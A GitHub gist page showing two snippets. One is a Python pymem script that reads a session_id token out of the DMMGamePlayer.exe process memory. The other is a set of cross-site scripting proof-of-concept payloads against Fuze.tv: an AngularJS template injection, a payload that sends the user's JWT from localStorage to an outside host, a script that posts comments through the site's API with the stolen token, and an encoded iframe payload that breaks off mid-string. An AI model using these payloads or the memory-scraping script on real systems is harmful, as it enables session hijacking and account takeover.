Skip to content

Instantly share code, notes, and snippets.

@lutwidse
lutwidse / dmm_session.py
Last active January 27, 2023 12:34
priconner_launch.py
from pymem import *
import re
BASE = 0xC000026000
pm = Pymem("DMMGamePlayer.exe")
bytes_pattern = b"\x73\x65\x73\x73\x69\x6f\x6e\x5f\x69\x64\x3d"
offset = (0x2f + 0x1 + 0x30)
start_address = pymem.pattern.scan_pattern_page(pm.process_handle, BASE, bytes_pattern)
dmm_session = pymem.memory.read_string(pm.process_handle, start_address[1], offset)
@lutwidse
lutwidse / fuze.tv-xss.js
Last active March 10, 2022 12:04
Fuze.tv Vulnerability PoCs
- XSS AngularJS
{{constructor.constructor('alert(1)')()}}
- XSS steal token
<video><source onerror=location=/\google.com/+localStorage.getItem("jwt_token")>
- XSS that cause user to interact with API
<script>const scheme = ["ht","tp","s"]; const payload = {"message":"Hello there","parentId":"0","attachedVideoEntryId":null};const param = {method: "POST", headers: {'Authorization': localStorage.getItem("jwt_token"), 'Accept': "application/json, text/plain, */*", 'Content-Type': "application/json;charset=UTF-8"}, body: JSON.stringify(payload)};fetch(scheme.join('')+"://brain.fuze.tv/api/feed/comment/1/60fac75b38e93f0019fc24d6", param).then((res)=>{return(res.json());}).then((json)=>{alert("executed")})</script>
<iframe srcdoc=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x73;&#x63;&#x68;&#x65;&#x6D;&#x65;&#x20;&#x3D;&#x20;&#x5B;&#x22;&#x68;&#x74;&#x22;&#x2C;&#x22;&#x74;&#x70;&#x22;&#x2C;&#x22;&#x73;&#x22;&#x5D;&#x3B;&#x20;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x70;&#x61;&